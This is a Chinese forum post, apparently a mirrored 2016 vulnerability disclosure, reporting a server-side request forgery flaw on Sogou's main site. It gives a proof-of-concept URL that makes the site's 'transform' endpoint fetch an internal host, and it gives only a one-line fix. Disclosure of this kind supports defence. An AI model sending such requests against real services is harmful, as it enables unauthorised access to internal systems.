HanDs
管理员

[7月漏洞公开] 搜狗主站另一处ssrf 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

骚狗的ssrf又来了~

详细说明:

搜了一下,发现和之前测漏的url完全不同,应该不能算重复,所以提交一下。



http://www.sogou.com/reventondc/transform?charset=GBK&key=2000&objid=2000000&type=2&url=http://cloud.sogou-op.org&userarea=sss&uuid=111&vrid=123



证明1

sogou1.png





证明2

sogou2.png





证明3

sogou3.png

漏洞证明:

搜了一下,和之前漏的URL不同,应该不算重复



http://www.sogou.com/reventondc/transform?charset=GBK&key=2000&objid=2000000&type=2&url=http://cloud.sogou-op.org&userarea=sss&uuid=111&vrid=123



证明1

sogou1.png





证明2

sogou2.png





证明3

sogou3.png

修复方案:

限制一下吧~骚狗~


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
搜狗
#1楼
发帖时间:2016-7-9   |   查看数:0   |   回复数:0
游客组
快速回复